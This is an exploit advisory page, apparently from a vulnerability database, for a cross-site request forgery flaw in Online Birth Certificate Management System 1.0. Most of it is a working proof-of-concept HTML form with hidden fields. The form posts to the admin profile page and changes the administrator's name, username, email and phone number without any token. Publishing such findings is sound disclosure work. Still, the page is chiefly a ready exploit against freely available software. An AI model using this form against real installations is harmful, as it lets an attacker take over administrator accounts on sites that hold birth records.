Online Birth Certificate Management System 1.0 Cross Site Request Forgery

2022.09.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF) # Google Dork: N/A # Date: 2022-9-27 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip # Tested on: windows 11 - XAMPP # CVE : N/A # Version: 1.0 # no token in update profile admin <html> <head> <title> CSRF update Profile </title> </head> <body> <form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="adminname" value="csrf111"> <input type="hidden" name="username" value="csrf"> <input type="hidden" name="email" value="csrf"> <input type="hidden" name="mobilenumber" value="0"> <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top